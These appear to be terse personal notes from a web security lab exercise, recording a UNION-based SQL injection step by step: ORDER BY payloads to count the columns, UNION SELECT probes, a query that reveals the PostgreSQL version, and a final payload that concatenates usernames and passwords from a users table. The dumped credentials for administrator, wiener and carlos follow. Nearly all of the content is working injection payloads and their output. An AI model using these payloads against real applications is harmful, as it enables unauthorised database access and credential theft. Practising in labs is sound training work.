
' order by 1-- -> not displayed on the page
' order by 2-- -> displayed on the page
' order by 3-- -> internal server error
3 - 1 = 2

' UNION SELECT 'a', NULL--
' UNION SELECT NULL, 'a'-- 

' UNION select NULL, username from users--
' UNION select NULL, password from users--

' UNION select NULL, version()--
-> PostgreSQL 11.11 (Debian 11.11-1.pgdg90+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516, 64-bit

' UNION select NULL, username || ':' || password from users--

administrator:9imewthzxln3b1806vhh
wiener:9v09u1vyl3ndgpwclves
carlos:7jg2ytklk4c30108wtjc





